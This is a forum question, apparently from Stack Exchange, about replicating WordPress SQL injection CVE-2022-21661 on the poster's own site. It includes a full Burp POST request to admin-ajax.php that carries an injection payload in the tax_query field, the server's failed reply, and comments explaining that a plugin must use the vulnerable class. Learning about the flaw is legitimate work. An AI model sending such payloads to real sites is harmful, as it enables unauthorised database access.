# CVE 2022-21661 - WP Injection replication

Tags: exploit, wordpress, burp-suite, cve

I'm trying to replicate the vulnerability CVE 2022-21661 on my own website that is resulted vulnerable as according the versions involved, as according wp-scan.

I'm trying to submit a POST request with Burp as described in the POC on Exploit-db

https://www.exploit-db.com/exploits/50663

This is my request

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: MYHOST
Content-Length: 127
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Cookie: MY-COOKIES
Connection: close

action=heartbeat&nonce=MY_NONCE&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["SELECT%20DATABASE()"]}}}
```

But the aswer I receive is the following

```
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2022 10:48:00 GMT
Server: Apache
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 17

{"success":false}
```

There is something wrong on how I am using the vulnerability?

I add I have no waf on my website, and the wp version is 5.6.4

Comment: Do you understand the cause of this vulnerability?

Comment: Honestly probably not completely. I followed this article https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection but probably there is something I miss. I know to solve it I just need to update the release, but I'm trying to learn why this happens.

Comment: @Giacomo Are you using a plain installation of wp? Because while the issue exists in wp core, it doesn't seem to be exploitable with just a plain install. From your link: "The vulnerability occurs when a plugin uses the vulnerable class" and "In this case, the bug is exposed through plugins, but exists within WordPress itself."